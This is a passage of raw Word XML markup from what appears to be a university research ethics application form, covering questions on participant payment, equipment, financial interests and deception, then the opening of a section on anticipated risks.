            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="077D27CA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="676C2727" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">If NO to any of above questions, please give an explanation </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="3F301D8B" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="365"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="617453CC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46BF97D2" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="38DBC087" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="33EA3790" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3B624F87" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Information for participants:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4591BB12" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02C270E4" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="78719C03" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="397B2058" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4394A71C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="341B150C" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6175CF56" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F9FFD57" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Will participants be paid?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="51043762"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="37C6F069"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51" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-256140063"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="6601C515"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992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="634219724"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="6CF2A7C5"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10DC6552" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0E03372B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C681CE0" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Is specialist electrical or other equipment to be used with participants?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1438982454"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="31289651"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51" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="2089267095"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="7D1B6C33"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992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="425468845"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="2012EB5F"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2EAFB713" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7227AB0A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76D99DEF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Are there any financial or other interests to the investigator or University arising from this study?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-225606969"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="158CCB0B"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51" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1565337314"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="55562A27"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992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-133575194"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="659C0D1B"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5C8B18CF" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="260F2DD1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F5D8391" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Will the research activity involve deliberately misleading participants in any way, or the partial or full concealment of the specific study aims?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-873932248"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="318D26F2"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851" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1867361740"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="0F1BE084"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992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="214328365"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="3B80F02F"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2D99BEB7" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5F439FF4" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="405C3CEA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">If YES to any question, please provide full details </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E3646EC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034BC0C7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:t>SECTION H: Anticipated Risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2F3B48" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1051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2410"/>
        <w:gridCol w:w="821"/>
        <w:gridCol w:w="171"/>
        <w:gridCol w:w="679"/>
        <w:gridCol w:w="171"/>
        <w:gridCol w:w="680"/>
      </w:tblGrid>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="5970A1C3" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0B01FA5A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="65EDF3D9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:br w:type="page"/>
              <w:t>Outline any anticipated risks</w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="SimSun"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">that may adversely affect any of the participants, the researchers and/or the University, and the steps that will be taken to address them. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74B0C05F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3BD0EF14" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">If you have completed a full risk assessment (for example as required by a laboratory, or external research collaborator) you may append that to this form.  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="08841171" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="50FAAB54" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8393" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3B8B882A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">Full risk assessment completed and appended? </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72F37425" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="00BB94D3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">Yes </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:bookmarkStart w:id="524" w:name="_Toc111363387"/>
        <w:bookmarkStart w:id="525" w:name="_Toc111363477"/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:p w14:paraId="37490CFD" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="-2006964611"/>
                <w14:checkbox>
                  <w14:checked w14:val="0"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
            <w:bookmarkEnd w:id="524"/>
            <w:bookmarkEnd w:id="525"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="0D532616" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4D9DDE96" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8393" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3C7105B9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="56F54CE4" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:bookmarkStart w:id="526" w:name="_Toc111363389"/>
        <w:bookmarkStart w:id="527" w:name="_Toc111363479"/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
